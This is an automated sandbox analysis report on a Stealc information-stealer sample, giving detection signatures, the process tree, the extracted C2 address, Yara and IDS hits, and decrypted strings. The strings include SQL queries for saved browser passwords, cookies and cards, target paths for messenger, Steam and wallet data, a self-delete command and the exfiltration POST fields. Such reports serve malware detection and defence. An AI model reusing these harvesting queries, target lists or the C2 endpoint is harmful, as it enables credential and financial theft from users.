Windows Analysis Report
ssB9bjDQPf.exe

Overview

General Information

Sample name: ssB9bjDQPf.exe (renamed because the original name is a hash value)
Original sample name: 26ceb3d9dcc1821192b39eea6832d51d.exe
Analysis ID: 1572687
MD5: 26ceb3d9dcc1821192b39eea6832d51d
SHA1: d22dae62f3d122acaec58a03550d5d99a9b7cfb4
SHA256: fe7c9c900df7c51f53243053dcf41ee781d284206742952aea704735d8d4a198
Tags: exe, Stealc, user-abuse_ch

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • ssB9bjDQPf.exe (PID: 1736 cmdline: "C:\Users\user\Desktop\ssB9bjDQPf.exe" MD5: 26CEB3D9DCC1821192B39EEA6832D51D)
    • 8DF0.tmp.exe (PID: 1280 cmdline: "C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe" MD5: 5DE218396F8C0A36CEE31B8EE4FD0BFE)
      • WerFault.exe (PID: 3500 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1280 -s 1304 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development builds on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://92.255.57.89/45c616e921a794b8.php", "Botnet": "default"}
Source | Rule | Description | Author | Strings
00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000003.00000002.1833922228.000000000092A000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown
  • 0x1090:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.3902949566.0000000000AF9000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown
  • 0xf88:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Source | Rule | Description | Author | Strings
3.2.8DF0.tmp.exe.2480e67.1.raw.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
3.3.8DF0.tmp.exe.24c0000.0.raw.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
3.2.8DF0.tmp.exe.400000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
3.3.8DF0.tmp.exe.24c0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
3.2.8DF0.tmp.exe.2480e67.1.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-10T18:58:42.967098+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49724 | 172.67.179.207 | 443 | TCP
2024-12-10T18:58:44.541123+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49725 | 176.113.115.19 | 80 | TCP



AV Detection

Source: https://post-to-me.com/track_prt.php?sub=0&cc=DE_ | Avira URL Cloud: Label: malware
Source: http://92.255.57.89/45c616e921a794b8.php | Avira URL Cloud: Label: malware
Source: http://92.255.57.89 | Avira URL Cloud: Label: malware
Source: http://92.255.57.89/T | Avira URL Cloud: Label: malware
Source: http://92.255.57.89/ | Avira URL Cloud: Label: malware
Source: https://post-to-me.com/track_prt.php?sub=0&cc=DEu | Avira URL Cloud: Label: malware
Source: http://92.255.57.89/A | Avira URL Cloud: Label: malware
Source: 00000003.00000003.1561878307.00000000024C0000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: StealC {"C2 url": "http://92.255.57.89/45c616e921a794b8.php", "Botnet": "default"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe | ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | ReversingLabs: Detection: 44%
Source: ssB9bjDQPf.exe | ReversingLabs: Detection: 44%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Joe Sandbox ML: detected
Source: ssB9bjDQPf.exe | Joe Sandbox ML: detected
Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpack | String decryptor (decrypted strings, one per entry, in report order):
  • INSERT_KEY_HERE
  • 26
  • 12
  • 20
  • 24
  • GetProcAddress
  • LoadLibraryA
  • lstrcatA
  • OpenEventA
  • CreateEventA
  • CloseHandle
  • Sleep
  • GetUserDefaultLangID
  • VirtualAllocExNuma
  • VirtualFree
  • GetSystemInfo
  • VirtualAlloc
  • HeapAlloc
  • GetComputerNameA
  • lstrcpyA
  • GetProcessHeap
  • GetCurrentProcess
  • lstrlenA
  • ExitProcess
  • GlobalMemoryStatusEx
  • GetSystemTime
  • SystemTimeToFileTime
  • advapi32.dll
  • gdi32.dll
  • user32.dll
  • crypt32.dll
  • GetUserNameA
  • CreateDCA
  • GetDeviceCaps
  • ReleaseDC
  • CryptStringToBinaryA
  • sscanf
  • VMwareVMware
  • HAL9TH
  • JohnDoe
  • DISPLAY
  • %hu/%hu/%hu
  • http://92.255.57.89
  • /45c616e921a794b8.php
  • /697b92cb4e247842/
  • default
  • GetEnvironmentVariableA
  • GetFileAttributesA
  • HeapFree
  • GetFileSize
  • GlobalSize
  • CreateToolhelp32Snapshot
  • IsWow64Process
  • Process32Next
  • GetLocalTime
  • FreeLibrary
  • GetTimeZoneInformation
  • GetSystemPowerStatus
  • GetVolumeInformationA
  • GetWindowsDirectoryA
  • Process32First
  • GetLocaleInfoA
  • GetUserDefaultLocaleName
  • GetModuleFileNameA
  • DeleteFileA
  • FindNextFileA
  • LocalFree
  • FindClose
  • SetEnvironmentVariableA
  • LocalAlloc
  • GetFileSizeEx
  • ReadFile
  • SetFilePointer
  • WriteFile
  • CreateFileA
  • FindFirstFileA
  • CopyFileA
  • VirtualProtect
  • GetLogicalProcessorInformationEx
  • GetLastError
  • lstrcpynA
  • MultiByteToWideChar
  • GlobalFree
  • WideCharToMultiByte
  • GlobalAlloc
  • OpenProcess
  • TerminateProcess
  • GetCurrentProcessId
  • gdiplus.dll
  • ole32.dll
  • bcrypt.dll
  • wininet.dll
  • shlwapi.dll
  • shell32.dll
  • rstrtmgr.dll
  • CreateCompatibleBitmap
  • SelectObject
  • BitBlt
  • DeleteObject
  • CreateCompatibleDC
  • GdipGetImageEncodersSize
  • GdipGetImageEncoders
  • GdipCreateBitmapFromHBITMAP
  • GdiplusStartup
  • GdiplusShutdown
  • GdipSaveImageToStream
  • GdipDisposeImage
  • GdipFree
  • GetHGlobalFromStream
  • CreateStreamOnHGlobal
  • CoUninitialize
  • CoInitialize
  • CoCreateInstance
  • BCryptGenerateSymmetricKey
  • BCryptCloseAlgorithmProvider
  • BCryptDecrypt
  • BCryptSetProperty
  • BCryptDestroyKey
  • BCryptOpenAlgorithmProvider
  • GetWindowRect
  • GetDesktopWindow
  • GetDC
  • CloseWindow
  • wsprintfA
  • EnumDisplayDevicesA
  • GetKeyboardLayoutList
  • CharToOemW
  • wsprintfW
  • RegQueryValueExA
  • RegEnumKeyExA
  • RegOpenKeyExA
  • RegCloseKey
  • RegEnumValueA
  • CryptBinaryToStringA
  • CryptUnprotectData
  • SHGetFolderPathA
  • ShellExecuteExA
  • InternetOpenUrlA
  • InternetConnectA
  • InternetCloseHandle
  • HttpSendRequestA
  • HttpOpenRequestA
  • InternetReadFile
  • InternetCrackUrlA
  • StrCmpCA
  • StrStrA
  • StrCmpCW
  • PathMatchSpecA
  • GetModuleFileNameExA
  • RmStartSession
  • RmRegisterResources
  • RmGetList
  • RmEndSession
  • sqlite3_open
  • sqlite3_prepare_v2
  • sqlite3_step
  • sqlite3_column_text
  • sqlite3_finalize
  • sqlite3_close
  • sqlite3_column_bytes
  • sqlite3_column_blob
  • encrypted_key
  • PATH
  • C:\ProgramData\nss3.dll
  • NSS_Init
  • NSS_Shutdown
  • PK11_GetInternalKeySlot
  • PK11_FreeSlot
  • PK11_Authenticate
  • PK11SDR_Decrypt
  • C:\ProgramData\
  • SELECT origin_url, username_value, password_value FROM logins
  • browser:
  • profile:
  • url:
  • login:
  • password:
  • Opera
  • OperaGX
  • Network
  • cookies
  • .txt
  • SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
  • TRUE
  • FALSE
  • autofill
  • history
  • SELECT url FROM urls LIMIT 1000
  • cc
  • SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
  • name:
  • month:
  • year:
  • card:
  • Cookies
  • Login Data
  • Web Data
  • History
  • logins.json
  • formSubmitURL
  • usernameField
  • encryptedUsername
  • encryptedPassword
  • guid
  • SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
  • SELECT fieldname, value FROM moz_formhistory
  • SELECT url FROM moz_places LIMIT 1000
  • cookies.sqlite
  • formhistory.sqlite
  • places.sqlite
  • plugins
  • Local Extension Settings
  • Sync Extension Settings
  • IndexedDB
  • Opera Stable
  • Opera GX Stable
  • CURRENT
  • chrome-extension_
  • _0.indexeddb.leveldb
  • Local State
  • profiles.ini
  • chrome
  • opera
  • firefox
  • wallets
  • %08lX%04lX%lu
  • SOFTWARE\Microsoft\Windows NT\CurrentVersion
  • ProductName
  • x32
  • x64
  • %d/%d/%d %d:%d:%d
  • HARDWARE\DESCRIPTION\System\CentralProcessor\0
  • SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
  • DisplayName
  • DisplayVersion
  • Network Info:
  • - IP: IP?
  • - Country: ISO?
  • System Summary:
  • - HWID:
  • - OS:
  • - Architecture:
  • - UserName:
  • - Computer Name:
  • - Local Time:
  • - UTC:
  • - Language:
  • - Keyboards:
  • - Laptop:
  • - Running Path:
  • - CPU:
  • - Threads:
  • - Cores:
  • - RAM:
  • - Display Resolution:
  • - GPU:
  • User Agents:
  • Installed Apps:
  • All Users:
  • Current User:
  • Process List:
  • system_info.txt
  • freebl3.dll
  • mozglue.dll
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: msvcp140.dll
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: nss3.dll
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: softokn3.dll
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: vcruntime140.dll
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: \Temp\
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: .exe
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: runas
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: open
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: /c start
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: %DESKTOP%
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: %APPDATA%
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: %LOCALAPPDATA%
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: %USERPROFILE%
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: %DOCUMENTS%
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: %PROGRAMFILES_86%
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: %RECENT%
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: *.lnk
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: files
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: \discord\
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: \Local Storage\leveldb\CURRENT
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: \Local Storage\leveldb
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: \Telegram Desktop\
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: key_datas
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: D877F783D5D3EF8C*
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: map*
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: A7FDF864FBC10B77*
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: A92DAA6EA6F891F2*
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: F8806DD0C461824F*
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Telegram
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Tox
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: *.tox
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: *.ini
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Password
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: 00000001
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: 00000002
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: 00000003
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: 00000004
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: \Outlook\accounts.txt
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Pidgin
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: \.purple\
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: accounts.xml
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: dQw4w9WgXcQ
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: token:
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Software\Valve\Steam
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: SteamPath
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: \config\
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: ssfn*
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: config.vdf
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: DialogConfig.vdf
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: DialogConfigOverlay*.vdf
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: libraryfolders.vdf
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: loginusers.vdf
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: \Steam\
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: sqlite3.dll
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: done
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: soft
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: \Discord\tokens.txt
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: /c timeout /t 5 & del /f /q "
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: C:\Windows\system32\cmd.exe
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: https
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: POST
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: HTTP/1.1
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Content-Disposition: form-data; name="
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: hwid
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: build
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: token
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: file_name
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: file
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: message
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: screenshot.jpg
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_00404B80 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcatA,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,lstrlenA,lstrcpy,lstrcatA,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlenA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,3_2_00404B80
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_00406000 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcatA,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,memcpy,lstrlenA,lstrlenA,memcpy,lstrlenA,HttpSendRequestA,InternetReadFile,lstrlenA,lstrcpy,lstrcatA,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlenA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,3_2_00406000
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_00407690 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,3_2_00407690
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_00424090 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,3_2_00424090
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_00409BE0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,3_2_00409BE0
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_00409B80 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,3_2_00409B80
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_02489E47 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,3_2_02489E47
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_02497260 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,strtok_s,lstrlen,lstrcpy,memset,3_2_02497260
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_02486267 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,3_2_02486267
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_024A42F7 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,3_2_024A42F7
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_0248EFF7 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,3_2_0248EFF7
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_02497047 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,strtok_s,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,strtok_s,lstrlen,lstrcpy,memset,3_2_02497047
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_024878F7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,3_2_024878F7
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_02484DE7 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,3_2_02484DE7
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_02489DE7 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,3_2_02489DE7

Compliance

Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Unpacked PE file: 0.2.ssB9bjDQPf.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Unpacked PE file: 3.2.8DF0.tmp.exe.400000.0.unpack
